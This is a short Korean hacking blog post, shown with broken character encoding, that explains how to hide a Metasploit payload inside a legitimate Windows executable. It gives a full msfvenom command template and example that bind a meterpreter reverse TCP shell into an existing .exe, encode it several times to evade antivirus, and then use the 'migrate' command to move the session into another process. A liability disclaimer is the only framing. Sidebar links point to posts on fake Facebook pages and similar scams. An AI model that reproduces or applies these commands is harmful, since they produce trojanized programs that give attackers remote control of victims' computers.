Metasploit

ํŒŒ์ผํ•ฉ์น˜๊ธฐ (์•…์„ฑ์ฝ”๋“œ์žˆ๋Š” ํŒŒ์ผ๋งŒ๋“ค๊ธฐ)

๐“›๐“พ๐“ฌ๐“ฎ๐“ฝ๐“ฎ_๐“ข๐“ฝ๐“ฎ๐“ต๐“ต๐“ช 2016. 5. 24.
728x90
๋ฐ˜์‘ํ˜•

๋ชจ๋“  ์‚ฌ์šฉ์˜ ๋ฒ•์  


์ฑ…์ž„์€ ์‚ฌ์šฉ์ž 


๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค.


msfvenom -a ์•„ํ‚คํ…์ณ --platform ํ”Œ๋žซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe


ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe



ํ•ธ๋“ค๋Ÿฌ์—์„œ ํ”„๋กœ์„ธ์Šค ์˜ฎ๊ธฐ๋Š” ๋ช…๋ น์–ด

migrate ํ”„๋กœ์„ธ์Šค ๋„˜๋ฒ„


ex) migrate 1111


728x90
๋ฐ˜์‘ํ˜•

'Metasploit' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

Heartbleed :) ํ•˜ํŠธ๋ธ”๋ฆฌ๋“œ  (0) 2016.12.21
์š”์ฆ˜ ์œ ํ–‰ ํ•˜๋˜ ๋ชธ์บ  (๊ธฐ์ดˆ๋ฐฉ์‹)  (0) 2016.12.15
๊ฐ€์งœ facebook๋งŒ๋“ค๊ธฐ  (5) 2016.02.11
stagefright.py  (0) 2016.02.10
postgreSQL?  (0) 2015.12.14

๋Œ“๊ธ€